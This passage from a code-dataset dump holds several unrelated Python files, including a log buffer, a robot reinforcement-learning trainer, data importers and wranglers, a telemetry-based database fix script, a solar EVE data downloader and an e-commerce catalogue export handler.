0 and is_log_start(msg):\n            msg_parts = raw_msg_arr[last_start_line_n: line_n]\n            current_msg = \"\\n\".join(msg_parts)\n            log_arr.append(current_msg)\n            last_start_line_n = line_n\n    msg_parts = raw_msg_arr[last_start_line_n:]\n    last_log = \"\\n\".join(msg_parts)\n    log_arr.append(last_log)\n    return log_arr\n\n\nclass LogBuffer(object):\n\n    def __init__(self, abs_path, max_file_size=DEFAULT_MAX_FILE_SIZE):\n        self.folder, self.filename = (os.path.dirname(abs_path),\n                                      os.path.basename(abs_path))\n        self.max_file_size = max_file_size\n        self.filename_regex = \\\n            re.compile(FILENAME_REGEX_PATTERN % self.filename)\n        self.handle_lock = threading.RLock()\n\n    @property\n    def current_log_file(self):\n        abs_path = os.path.join(self.folder, self.filename)\n        ensure_path(abs_path)\n        return abs_path\n\n    def _get_oldest_index(self):\n        '''\n        The smallest number is the oldest.\n        When no file with suffix exists, return 0\n        '''\n        filenames = os.listdir(self.folder)\n        indexes = [int(self.filename_regex.match(fn).group(1))\n                   for fn in filenames if self.filename_regex.match(fn)]\n        if not indexes:\n            # no file exists except file\n            return 0\n        return min(indexes)\n\n    @property\n    def oldest_group_file(self):\n        index = self._get_oldest_index()\n        fn = \"%s.%s\" % (self.filename, index) \\\n            if index != 0 else self.filename\n        abs_path = os.path.join(self.folder, fn)\n        return abs_path\n\n    def _get_oldest_group(self):\n        with open(self.oldest_group_file, 'r') as f:\n            raw_lines = [line.strip() for line in 
f.readlines() if line]\n group = generate_log_array(raw_lines)\n return group\n\n def _rewrite_oldest_group(self, new_group):\n content = \"\\n\".join(new_group)\n with open(self.oldest_group_file, 'w') as f:\n f.write(content)\n\n def _delete_oldest_group(self):\n os.remove(self.oldest_group_file)\n\n def _generate_next_filename(self):\n last_index = self._get_oldest_index()\n new_index = last_index + 1\n return \"%s.%s\" % (self.filename, new_index)\n\n def has_log(self):\n if self._get_oldest_index() > 0:\n return True\n else:\n # allow for a return, it's a little arbitrary.\n return True if file_size(self.current_log_file) > 1 \\\n else False\n\n def add_log(self, msg):\n '''\n Interface to write log.\n '''\n with self.handle_lock:\n if file_size(self.current_log_file) + len(msg) \\\n > self.max_file_size:\n new_backup_filename = self._generate_next_filename()\n shutil.move(self.current_log_file,\n os.path.join(self.folder, new_backup_filename))\n with open(self.current_log_file, 'a') as f:\n f.write(\"%s\\n\" % msg)\n\n def clean_oldest_group(self, retry_func):\n '''\n Interface to clean buffer.\n '''\n with self.handle_lock:\n oldest_group = self._get_oldest_group()\n for log in oldest_group:\n if retry_func(log):\n oldest_group.remove(log)\n if oldest_group:\n self._rewrite_oldest_group(oldest_group)\n else:\n self._delete_oldest_group()\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"qfpay_scribe_logger/logbuffer.py","file_name":"logbuffer.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"359571965","text":"#!/usr/bin/env python\n\nimport gym\nfrom gym import wrappers\nimport gym_gazebo\nimport time\nfrom distutils.dir_util import copy_tree\nimport os\nimport json\nimport liveplot\nimport ac_actorcritic as ac\nimport csv\nimport numpy as np\nimport tensorflow.compat.v1 as tf\nimport random\nimport ac_memory as memory\nimport pandas as pd\n\n#for xrange\nfrom past.builtins import xrange\n\ndef detect_monitor_files(training_dir):\n return [os.path.join(training_dir, f) for f in os.listdir(training_dir) if f.startswith('openaigym')]\n\ndef clear_monitor_files(training_dir):\n files = detect_monitor_files(training_dir)\n if len(files) == 0:\n return\n for file in files:\n print(file)\n os.unlink(file)\n\nif __name__ == '__main__': \n\t#REMEMBER!: project_setup.bash must be executed.\n env = gym.make('GazeboProjectTurtlebotAc-v0')\n action_dim = env.action_space.shape[0]\n observation_dim = env.observation_space.shape\n \n main_outdir = '/home/katolab/experiment_data/AC_data_2/'\n outdir = main_outdir + 'gazebo_gym_experiments/'\n path = main_outdir + 'project_ac_ep'\n \n continue_execution = False\n \n #fill this if continue_execution=True\n resume_epoch = '1900' # change to epoch to continue from\n resume_path = path + resume_epoch\n actor_weights_path = resume_path + '_actor.h5'\n actor_target_weights_path = resume_path + '_actor_target.h5'\n critic_weights_path = resume_path + '_critic.h5'\n critic_target_weights_path = resume_path + '_critic_target.h5'\n params_json = resume_path + '.json'\n \n if not continue_execution:\n #Each time we take a sample and update our weights it is called a mini-batch.\n #Each time we run through the entire dataset, it's called an epoch.\n #PARAMETER LIST\n EPISODES = 5000\n STEPS = 50\n UPDATE_NETWORK = 1 # once per number of actions\n MINIBATCH_SIZE = 128\n MINIMUM_REPLAY_MEMORY = 1000\n A_LEARNING_RATE = 0.0001\n 
C_LEARNING_RATE = 0.0003\n GREEDY_BOOL = False\n GREEDY_RATE = 1\n REWARD_SCALE = 0.1\n DISCOUNT_FACTOR = 0.99\n MEMORY_SIZE = 250000\n A_HIDDEN_LAYER = [512,512,512]\n C_HIDDEN_LAYER = [[],[],[512,512,512]] # [[before merging critic],[before merging actor],[after merging]]\n CURRENT_EPISODE = 0\n TARGET_DISCOUNT = 0.001 # [0,1] 0: don't update target weights, 1: update target wieghts 100% from model weights\n MEMORIES = None\n\n else:\n #Load weights, monitor info and parameter info.\n with open(params_json) as outfile:\n d = json.load(outfile)\n EPISODES = d.get('EPISODES')\n STEPS = d.get('STEPS')\n UPDATE_NETWORK = d.get('UPDATE_NETWORK')\n MINIBATCH_SIZE = d.get('MINIBATCH_SIZE')\n MINIMUM_REPLAY_MEMORY = d.get('MINIMUM_REPLAY_MEMORY')\n A_LEARNING_RATE = d.get('A_LEARNING_RATE')\n C_LEARNING_RATE = d.get('C_LEARNING_RATE')\n GREEDY_BOOL = d.get('GREEDY_BOOL')\n GREEDY_RATE = d.get('GREEDY_RATE')\n REWARD_SCALE = d.get('REWARD_SCALE')\n DISCOUNT_FACTOR = d.get('DISCOUNT_FACTOR')\n MEMORY_SIZE = d.get('MEMORY_SIZE')\n A_HIDDEN_LAYER = d.get('A_HIDDEN_LAYER')\n C_HIDDEN_LAYER = d.get('C_HIDDEN_LAYER')\n CURRENT_EPISODE = d.get('CURRENT_EPISODE')\n TARGET_DISCOUNT = d.get('TARGET_DISCOUNT')\n MEMORIES = pd.read_csv(main_outdir + 'experience.csv', index_col=0, dtype = {'reward':np.float64, 'done':np.float32})\n \n clear_monitor_files(outdir)\n \n # Initialize Tensorflow session\n sess = tf.Session()\n \n # Actor model to take actions \n # state -> action\n actor = ac.Actor(sess, action_dim, observation_dim, A_LEARNING_RATE, A_HIDDEN_LAYER)\n # Critic model to evaluate the action taken by the actor\n # state + action -> Expected reward to be achieved by taking action in the state.\n critic = ac.Critic(sess, action_dim, observation_dim, C_LEARNING_RATE, C_HIDDEN_LAYER)\n \n # Initialize saver to save session's variables\n saver = tf.train.Saver()\n if not continue_execution: \n os.makedirs(outdir)\n sess.run(tf.initialize_all_variables())\n else:\n saver.restore(sess, main_outdir + 'project_ac_session_var-' + resume_epoch)\n plotter = liveplot.LivePlot(outdir)\n\n actor_critic = ac.ActorCritic(env, actor, critic, DISCOUNT_FACTOR, MINIBATCH_SIZE, MEMORY_SIZE, TARGET_DISCOUNT, continue_execution, MEMORIES)\n \n if continue_execution : actor_critic.loadModels(actor_weights_path, critic_weights_path, actor_target_weights_path, critic_target_weights_path)\n \n env._max_episode_steps = STEPS # env returns done after _max_episode_steps\n env = gym.wrappers.Monitor(env, outdir,force=not continue_execution, resume=continue_execution)\n\n stepCounter = 0\n min_distance = 20\n max_reward = 0\n \n start_time = time.time()\n \n env.set_start_mode(\"random\") #\"random\" or \"static\" \n \n states = []\n actions = []\n def make_state(states, actions, state, action):\n # update states and actions\n states.pop(0)\n actions.pop(0)\n states.append(state)\n actions.append(action)\n \n # merge past state and action\n _state = []\n for i in range(len(states)-1):\n _state += list(states[i]) + list(actions[i])\n _state += list(states[len(states)-1])\n return states, actions, np.asarray(tuple(_state)) \n \n #start iterating from 'current epoch'\n for episode in xrange(CURRENT_EPISODE+1, EPISODES+1, 1):\n done = False\n \n first_state = env.reset()\n first_action = np.array([0,0,0])\n states = [first_state, first_state, first_state]\n actions = [first_action, first_action]\n states, actions, cur_state = make_state(states, actions, first_state, first_action)\n \n action_memory = memory.Memory(STEPS)\n episode_reward 
= 0\n episode_step = 0\n new_episode = True\n while not done:\n action, action_step = actor_critic.act(cur_state, new_episode, GREEDY_RATE)\n _next_state, reward, done, _ = env.step(action_step)\n \n states, actions, next_state = make_state(states, actions, _next_state, action)\n\n episode_reward += reward\n\n # Add experience to replay memory\n actor_critic.replay_memory.addMemory(cur_state, action, reward*REWARD_SCALE, next_state, done)\n action_memory.addMemory(cur_state, action, reward, next_state, done)\n\n cur_state = next_state\n \n episode_step += 1\n stepCounter += 1\n\n if len(actor_critic.replay_memory.exp.index) >= MINIMUM_REPLAY_MEMORY:\n actor_critic.train('random')\n if episode%UPDATE_NETWORK == 0: actor_critic.updateTarget()\n \n new_episode = done\n \n if (len(actor_critic.replay_memory.exp.index) >= MINIMUM_REPLAY_MEMORY) and episode%UPDATE_NETWORK == 0: actor_critic.updateTarget()\n \n resetVel = False\n while not resetVel:\n try:\n env.reset_vel()\n resetVel = True\n except:\n pass\n \n m, s = divmod(int(time.time() - start_time), 60)\n h, m = divmod(m, 60)\n \n if env.subgoal_as_dist_to_goal < min_distance:\n min_distance = env.subgoal_as_dist_to_goal\n action_memory.exp.to_csv(outdir + 'min_distance.csv')\n if max_reward < episode_reward:\n max_reward = episode_reward\n action_memory.exp.to_csv(outdir + 'max_reward.csv')\n \n print(\"EP:\" + str(episode) + \" - \" + str(episode_step) + \"/\" + str(STEPS) + \" steps |\" + \" R: \" + str(episode_reward) + \" | Dist: \" + str(env.subgoal_as_dist_to_goal) + \" | Max R: \" + str(max_reward) + \" | Min Dist: \" + str(min_distance) + \"| Time: %d:%02d:%02d\" % (h, m, s))\n \n if (episode)%100==0: \n #save model weights and monitoring data every 100 epochs.\n actor_critic.saveModel(path+str(episode)+'_actor.h5', path+str(episode)+'_critic.h5', path+str(episode)+'_actor_target.h5', path+str(episode)+'_critic_target.h5')\n env._flush()\n \n #save simulation parameters.\n parameter_keys = ['EPISODES', 'STEPS', 'UPDATE_NETWORK', 'MINIBATCH_SIZE', 'MINIMUM_REPLAY_MEMORY', 'A_LEARNING_RATE', 'C_LEARNING_RATE', 'GREEDY_BOOL', 'GREEDY_RATE', 'REWARD_SCALE', 'DISCOUNT_FACTOR', 'MEMORY_SIZE', 'A_HIDDEN_LAYER', 'C_HIDDEN_LAYER', 'CURRENT_EPISODE', 'TARGET_DISCOUNT']\n parameter_values = [EPISODES, STEPS, UPDATE_NETWORK, MINIBATCH_SIZE, MINIMUM_REPLAY_MEMORY, A_LEARNING_RATE, C_LEARNING_RATE, GREEDY_BOOL, GREEDY_RATE, REWARD_SCALE, DISCOUNT_FACTOR, MEMORY_SIZE, A_HIDDEN_LAYER, C_HIDDEN_LAYER, episode, TARGET_DISCOUNT]\n parameter_dictionary = dict(zip(parameter_keys, parameter_values))\n with open(path+str(episode)+'.json', 'w') as outfile:\n json.dump(parameter_dictionary, outfile)\n \n # Save experiences data\n actor_critic.replay_memory.exp.to_csv(main_outdir + 'experience.csv')\n \n # Show rewards graph\n plotter.plot(env, outdir)\n \n # Save tf.session variables\n saver.save(sess, main_outdir + 'project_ac_session_var', global_step=episode)\n \n # Greedy rate update\n if GREEDY_BOOL: GREEDY_RATE = max(0.05, GREEDY_RATE*0.9987) # 3000eps: 0.9987, 1000eps: 0.997\n \n # Save rewards\n with open(main_outdir + 'reward_ac.csv','a+') as csvRWRD:\n csvRWRD_writer = csv.writer(csvRWRD,dialect='excel')\n csvRWRD_writer.writerow([episode, episode_step, episode_reward, env.subgoal_as_dist_to_goal])\n csvRWRD.close()\n \n env.close()\n\n\n","sub_path":"ac_main_2.py","file_name":"ac_main_2.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} 
+{"seq_id":"601241285","text":"'''\nPurpose:\n 1. 读取TrustData每个月Excel报表,导入数据库\nAuthor: Patrick Zhang(Patrick.zhang@bda.com)\nHistory:\n 2016.04.08 Patrick Zhang write comments in this format\n'''\nimport openpyxl\nimport warnings\nimport calendar\nfrom datetime import date, datetime\nfrom helpers.utils import upsert_batch\n\nwarnings.filterwarnings(\"ignore\")\n\nTODAY = date.today()\ndays_num = 0\n\nFLAGS = [\n 'Monthly Active Users (mln)', 'Daily Active Users (mln)',\n 'Daily Startups per User (#)', 'Daily Time Spent per User (Min)']\n\ndef read_excel(fpath, target_date):\n global days_num\n a_date = datetime.strptime(target_date, '%Y-%m-%d').date()\n days_num = calendar.monthrange(a_date.year, a_date.month)[1]\n\n # 使用Readonly读取会很快\n wb = openpyxl.load_workbook(filename=fpath, read_only=True, data_only=True)\n\n for ws in wb:\n title = ws.title.strip()\n # 当前处于什么位置\n # 0: mau, 1: dau, 2: startups, 3: time\n flag = None\n # 结果集\n result_dict = {}\n # 遍历每一行\n for row_index, row in enumerate(ws.rows):\n # 跳过前两行, 跳过空白行\n if row_index <= 1 \\\n or (row[0].value is None and row[1].value is None):\n continue\n # 设置Flag\n if row[1].value and str(row[1].value).strip() in FLAGS:\n flag = FLAGS.index(row[1].value.strip())\n if row_index != 2:\n continue\n elif 'MoM change' in str(row[1].value):\n flag = None\n continue\n elif flag is None:\n continue\n # 第三行,找日期所在列\n if row_index == 2:\n for column_index, cell in enumerate(row):\n if str(cell.value).split(' ')[0] == target_date:\n print('目标数据在%s列' % column_index)\n break\n continue\n # 开始收集数据\n print(flag, row[2].value, row[column_index].value)\n app_name_en, app_name, value = str(row[1].value).strip(), str(row[2].value).strip(), row[column_index].value\n # 初始化结果集\n if app_name in result_dict:\n result_dict[app_name][flag] = value\n else:\n result_dict[app_name] = [0] * 4\n result_dict[app_name].extend([app_name_en, target_date, title])\n result_dict[app_name][flag] = value\n\n if result_dict:\n print(result_dict)\n wrap(result_dict)\n\ndef wrap(result_dict):\n # 先处理从Excel读取的记录,然后导入数据库\n insert_list = []\n for app_name, value_list in result_dict.items():\n # 单位千\n mau = value_list[0] * 1000\n dau = value_list[1] * 1000\n # 单位次,分钟\n per_capita_daily_startup_counts, per_capita_daily_use_time, app_name_en, target_date, sector = value_list[2:]\n\n per_startup_use_time = per_capita_daily_use_time / per_capita_daily_startup_counts\n total_startup_counts = dau * per_capita_daily_startup_counts * days_num\n total_use_time = (per_startup_use_time * total_startup_counts) / 60\n\n insert_list.append([\n app_name, app_name_en, sector, target_date, dau, per_capita_daily_startup_counts, per_startup_use_time,\n mau, per_capita_daily_use_time, total_startup_counts, total_use_time, 'TrustData', str(TODAY),\n '30', 'Mobile', 'APP', 'iOS + Android'])\n\n sql = (\n 'INSERT INTO app(app_name, app_name_en, sector, starting_date, daily_active_user, per_capita_daily_startup_counts, '\n ' per_startup_use_time, active_users, per_capita_daily_use_time, total_startup_counts , total_use_time,'\n ' source, createddate, date_type, app_type, data_type, os) '\n ' VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)')\n\n upsert_batch(sql, insert_list)\n\n\nif __name__ == '__main__':\n read_excel(\n 'D:/BDA_Files/Original Data/local/TrustData/20160408/Trustdata数据报表-tiger-2016 04 05.xlsx',\n 
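# target_date ('YYYY-MM-DD') picks the month to import and the matching report column\n        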
'2016-03-01')\n","sub_path":"handler/trustdata_excel_import.py","file_name":"trustdata_excel_import.py","file_ext":"py","file_size_in_byte":4165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"569353614","text":"#!/usr/bin/env python\n# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\"\"\"\nOne-off script to fix residual mismatches in cmd_states pitch and SIM-Z. These\nare largely due to SCS107 runs with a dense set of replans that are not exactly\ncaptured in the timeline loads.\n\nThis script uses telemetry to repair the errant command states. The result is still\nnot perfect but mostly good. The last fix is 2007:153.\n\n# Fetch comparison telemetry\nfetch --start 2002:010 --stop 2009:001:00:00:00 --dt 600 --outfile tlm2002_2008.dat \\\n --time-format secs aopcadmd cobsrqid tscpos aosares1 point_suncentang\n\n\"\"\"\n\n# import Ska.Table\nimport Ska.DBI\nimport Chandra.cmd_states as cmd_states\n\ndef get_options():\n from optparse import OptionParser\n parser = OptionParser()\n parser.set_defaults()\n parser.add_option(\"--dbi\",\n default='sqlite',\n help=\"Database interface (sqlite|sybase)\")\n parser.add_option(\"--server\",\n default='db_base.db3',\n help=\"DBI server (|sybase)\")\n \n (opt, args) = parser.parse_args()\n return (opt, args)\n\ndef main():\n import numpy as np\n from scipy.signal import medfilt\n\n opt, args = get_options()\n\n if 'tlm' not in globals():\n print('Reading telemetry')\n tlm = Ska.Table.read_ascii_table('t/tlm2002_2008.dat', delimiters=[','])\n\n db = Ska.DBI.DBI(dbi=opt.dbi, server=opt.server)\n\n datestart = '2002:010:00:00:00' \n datestop = '2009:001:00:00:00'\n\n if 'states' not in globals():\n print('Getting states')\n states = db.fetchall(\"\"\"SELECT * from cmd_states\n WHERE datestart > '%s'\n AND datestop < '%s'\"\"\" % (datestart, datestop))\n ok = (tlm.date > states[0].tstart) & (tlm.date < states[-1].tstop)\n tlm = tlm[ok]\n state_vals = cmd_states.interpolate_states(states, tlm.date)\n\n simdiff = medfilt(tlm.tscpos - state_vals.simpos, 5)\n bad = abs(simdiff) > 5000.\n bad_state_idxs = np.unique(np.searchsorted(states.tstop, tlm[bad].date))\n for bad_state in states[bad_state_idxs]:\n ok = (tlm.date >= bad_state.tstart) & (tlm.date <= bad_state.tstop)\n simpos = np.median(tlm[ok].tscpos)\n cmd = \"UPDATE cmd_states SET simpos=%d WHERE datestart='%s'\" % (simpos, bad_state.datestart)\n print(cmd)\n db.execute(cmd)\n\n pitchdiff = medfilt(tlm.aosares1 - state_vals.pitch, 9)\n bad = abs(pitchdiff) > 5.\n bad_state_idxs = np.unique(np.searchsorted(states.tstop, tlm[bad].date))\n for bad_state in states[bad_state_idxs]:\n ok = (tlm.date >= bad_state.tstart) & (tlm.date <= bad_state.tstop)\n pitch = np.median(tlm[ok].aosares1)\n cmd = \"UPDATE cmd_states SET pitch=%f WHERE datestart='%s'\" % (pitch, bad_state.datestart)\n print(cmd)\n db.execute(cmd)\n\n db.commit()\n\nif __name__ == '__main__':\n main()\n \n","sub_path":"fix_pitch_simz.py","file_name":"fix_pitch_simz.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"275513915","text":"# -*- coding: utf-8 -*-\n#\n#\n# \n\"\"\"\n Provides programs to process and analyze EVE data.\n \n .. 
warning:: This module is still in development!\n\n\"\"\" \n\nfrom __future__ import absolute_import\nimport urllib\nimport csv\nfrom datetime import datetime, date, time \nfrom sunpy.time import parse_time\n\ndef get_latest_l0cs_goes_data():\n    \"\"\"Grab the latest EVE GOES Proxy data and plot it in a standard \n    (GOES) plot format\n    \n    Parameters\n    ----------\n    None : none\n\n    Returns\n    -------\n    value : tuple\n        Return a tuple (filename, headers) where filename is the local file \n        name under which the object can be found, and headers is \n        whatever the info() method of the object returned by urlopen.\n\n    See Also\n    --------\n\n    Examples\n    --------\n    >>> import sunpy.instr.sdoeve as eve\n    >>> eve.get_latest_l0cs_goes_data()\n    \n    Reference\n    ---------\n    | \n\n    \"\"\"\n    \n    #TODO should this be in the net module?\n    url = 'http://lasp.colorado.edu/eve/data_access/quicklook/quicklook_data/L0CS/LATEST_EVE_L0CS_DIODES_1m.txt'\n    \n    f = urllib.urlretrieve(url)\n    reader = csv.reader(open(f[0], \"rb\"), delimiter = ' ', skipinitialspace = True)\n    \n    i = 0\n    \n    t = []\n    xrsb = []\n    xrsa = []\n    \n    for row in reader:\n        if row[0][0] != ';':\n            #read the date line\n            if i == 0:\n                d = date(int(row[0]),int(row[2]),int(row[3]))\n            else:\n                t.append(time(int(row[0][0:2]),int(row[0][2:4])))\n                xrsb.append(float(row[1]))\n                xrsa.append(float(row[2])) \n            i = i + 1\n    \n    ts = [datetime.combine(d,s) for s in t]\n    \n    return [ts,xrsa, xrsb]\n\ndef show_latest_l0cs_goes_data():\n    \"\"\"Download and plot the latest EVE GOES proxy data in a standard GOES plot.\n\n    Parameters\n    ----------\n    None : none\n\n    Returns\n    -------\n    None : none\n\n    See Also\n    --------\n\n    Examples\n    --------\n    >>> import sunpy.instr.sdoeve as eve\n    >>> eve.show_latest_l0cs_goes_data()\n    \n    Reference\n    ---------\n    | \n\n    \"\"\"\n    from sunpy.instr.goes import show as goes_show\n    \n    data = get_latest_l0cs_goes_data()\n    \n    goes_show(data[0], data[1], data[2], \n              title = 'EVE GOES Proxy Xray Flux (1 minute data)')\n    \ndef get_l0cs_data(time_range):\n    \"\"\"Download EVE Level 0CS data for a time range (not done coding!)\n    \n    .. warning:: Not done coding!\n    \"\"\"\n    return 0\n    \ndef get_l0cs_date(request_date):\n    \"\"\"Download EVE Level 0CS data for a specific date.\n\n    .. 
warning:: Not done coding!\n\n    Parameters\n    ----------\n    date : parse_time compatible time string or datetime object\n\n    Returns\n    -------\n    dict : none\n\n    See Also\n    --------\n\n    Examples\n    --------\n    >>> import sunpy.instr.sdoeve as eve\n    >>> data = eve.get_l0cs_date(['2010/04/03'])\n    \n    Reference\n    ---------\n    | http://lasp.colorado.edu/eve/data_access/\n    \n    \"\"\"\n    \n    url_root = 'http://lasp.colorado.edu/eve/data/quicklook/L0CS/SpWx/'\n    _date = parse_time(request_date)\n    \n    url = url_root + _date.strftime('%Y/%Y%m%d') + '_EVE_L0CS_DIODES_1m.txt'\n    url_counts = url_root + _date.strftime('%Y/%Y%m%d') + '_EVE_L0CS_DIODES_1m_counts.txt'\n    \n    f = urllib.urlretrieve(url)\n    reader = csv.reader(open(f[0], \"rb\"), delimiter = ' ', skipinitialspace = True)\n    \n    field_names = ('hhmm', 'xrs-b', 'xrs-a', 'sem', 'ESPquad', 'esp171', \n    'esp257', 'esp304', 'esp366', 'espdark', 'megsp', 'megsdark', \n    'q0esp', 'q1esp', 'q3esp', 'cmlat', 'cmlon')\n    \n    t = []\n    xrsb = []\n    xrsa = []\n    i = 0\n    for row in reader:\n        if row[0][0] != ';':\n            #read the date line\n            if i == 0:\n                d = date(int(row[0]),int(row[2]),int(row[3]))\n            else:\n                t.append(time(int(row[0][0:2]),int(row[0][2:4])))\n                xrsb.append(float(row[1]))\n                xrsa.append(float(row[2]))    \n            i = i + 1\n    ","sub_path":"sunpy/instr/sdoeve.py","file_name":"sdoeve.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"638839715","text":"class Solution:\n    def shortestToChar0(self, S, C):\n        prev = float('-inf')\n        ans = []\n        for i, x in enumerate(S):\n            if x == C: prev = i\n            ans.append(i - prev)\n\n        prev = float('inf')\n        for i in range(len(S) - 1, -1, -1):\n            if S[i] == C: prev = i\n            ans[i] = min(ans[i], prev - i)\n\n        return ans\n\n    def shortestToChar(self, S, C):\n        n = len(S)\n        res = [n] * n\n        pos = -n\n        for i in list(range(n)) + list(range(n)[::-1]):\n            if S[i] == C: pos = i\n            res[i] = min(res[i], abs(i - pos))\n        return res\n\n\nif __name__ == \"__main__\":\n    sol = Solution()\n    print(sol.shortestToChar(\"loveleetcode\", 'e'))\n","sub_path":"Solutions/821. 
Shortest Distance to a Character/821.py","file_name":"821.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"557289951","text":"def weird(n):\n\ts=[]\n\twhile n!=1:\n\t\ts.append(str(n))\n\t\tif n%2==0:\n\n\t\t\tn=n//2\n\t\telse:\n\t\t\tn=(n*3)+1\n\ts.append(str(n))\n\tprint(\" \".join(s))\n\n\ndef missing(num,vals):\n\tf=list(sorted(vals))\n\tfor i in range(1,f[-1]+1):\n\t\tif i not in f:\n\t\t\tprint(i)\n\t\t\tbreak\n\n\n\nn=int(input())\nweird(n)\nmissing(5,[2,3,1,5])\n\n","sub_path":"td.py","file_name":"td.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"572649932","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass TechriskInnovateMpcpromoDataQueryModel(object):\n\n def __init__(self):\n self._goods_id = None\n self._page_no = None\n self._page_size = None\n\n @property\n def goods_id(self):\n return self._goods_id\n\n @goods_id.setter\n def goods_id(self, value):\n self._goods_id = value\n @property\n def page_no(self):\n return self._page_no\n\n @page_no.setter\n def page_no(self, value):\n self._page_no = value\n @property\n def page_size(self):\n return self._page_size\n\n @page_size.setter\n def page_size(self, value):\n self._page_size = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.goods_id:\n if hasattr(self.goods_id, 'to_alipay_dict'):\n params['goods_id'] = self.goods_id.to_alipay_dict()\n else:\n params['goods_id'] = self.goods_id\n if self.page_no:\n if hasattr(self.page_no, 'to_alipay_dict'):\n params['page_no'] = self.page_no.to_alipay_dict()\n else:\n params['page_no'] = self.page_no\n if self.page_size:\n if hasattr(self.page_size, 'to_alipay_dict'):\n params['page_size'] = self.page_size.to_alipay_dict()\n else:\n params['page_size'] = self.page_size\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = TechriskInnovateMpcpromoDataQueryModel()\n if 'goods_id' in d:\n o.goods_id = d['goods_id']\n if 'page_no' in d:\n o.page_no = d['page_no']\n if 'page_size' in d:\n o.page_size = d['page_size']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/TechriskInnovateMpcpromoDataQueryModel.py","file_name":"TechriskInnovateMpcpromoDataQueryModel.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"354378026","text":"from os.path import join, basename\nimport csv\nDATA_DIR = 'tempdata'\n\nWRANGLED_HEADERS = ['year', 'name', 'gender' , 'ratio' , 'females', 'males', 'total']\nWRANGLED_DATA_FILENAME = join(DATA_DIR, 'wrangled2014.csv')\n\nYEAR = 2014\nthefilename = join(DATA_DIR, 'yob' + str(YEAR) + '.txt')\n\n\nnamesdict = {}\nwith open(thefilename, 'r') as thefile:\n for line in thefile:\n name, gender, count = line.split(',')\n if not namesdict.get(name):\n namesdict[name] = {'M': 0, 'F': 0}\n namesdict[name][gender] += int(count)\n\nmy_awesome_list = []\n\nfor name, babiescount in namesdict.items():\n xdict = {}\n xdict['year'] = YEAR\n xdict['name'] = name\n xdict['females'] = babiescount['F']\n xdict['males'] = babiescount['M']\n xdict['total'] = xdict['males'] + xdict['females']\n if xdict['females'] >= xdict['males']:\n xdict['gender'] = 'F'\n xdict['ratio'] = round(100 * xdict['females'] / xdict['total'])\n else:\n xdict['gender'] = 'M'\n 
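# male-majority name: the ratio is the male share of all babies with this name\n        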
xdict['ratio'] = round(100 * xdict['males'] / xdict['total'])\n my_awesome_list.append(xdict)\n\n\nwfile = open(WRANGLED_DATA_FILENAME, 'w')\nwcsv = csv.DictWriter(wfile, fieldnames=WRANGLED_HEADERS)\nwcsv.writeheader()\n\ndef xfoo(xdict):\n return (-xdict['total'], xdict['name'])\n\nmy_final_list = sorted(my_awesome_list, key=xfoo)\n\nfor row in my_final_list:\n wcsv.writerow(row)\nwfile.close()\n\n\nfinalfile = open(WRANGLED_DATA_FILENAME, 'r')\nthestupidlines = finalfile.readlines()[0:5]\nfor line in thestupidlines:\n print(line.strip())","sub_path":"exercises/0020-gender-detector/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"405687557","text":"\"\"\"\r\nCheck xml schema: https://pypi.python.org/pypi/xmlschema/0.9.8\r\n\"\"\"\r\nfrom django.shortcuts import render\r\nfrom django.template.response import TemplateResponse\r\nfrom django.conf import settings\r\nfrom django import template\r\nfrom demandware.models import ProductMaster, ProductMeta, RelatedProduct, Category, CategoryMeta, Variant, ProductImage, HeaderMgr\r\nfrom demandware.models_handler.category_handler import get_categories\r\nfrom demandware.models_handler.product_handler import *\r\nimport datetime\r\nimport xmlschema\r\nimport logging\r\n\r\n# Get an instance of a logger\r\nlogger = logging.getLogger('django')\r\n\r\ndef handle_export(form=None):\r\n\tdata_type = form.cleaned_data.get('data_type')\r\n\tif int(data_type) == 1:\r\n\t\treturn handle_export_catalogs()\r\n\tif int(data_type) == 2:\r\n\t\treturn handle_export_pricebook()\r\n\tif int(data_type) == 3:\r\n\t\treturn handle_export_inventory()\r\n\tif int(data_type) == 4:\r\n\t\treturn handle_export_category()\r\n\tif int(data_type) == 5:\r\n\t\treturn handle_export_product()\r\n\tif int(data_type) == 6:\r\n\t\treturn handle_export_recommand()\r\n\treturn None\r\n\r\ndef handle_export_catalogs():\r\n\ttry:\r\n\t\tcategories = get_categories()\r\n\t\tproducts = get_product_master()\r\n\t\tvariants = get_product_variants()\r\n\t\tproduct_category = get_product_category()\r\n\t\trelated_products = get_related_product()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\tcategories=categories,\r\n\t\t\tproductMaster=products,\r\n\t\t\tproductVariants=variants,\r\n\t\t\tproductCategory=product_category,\r\n\t\t\trelatedProducts=related_products,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n\r\ndef 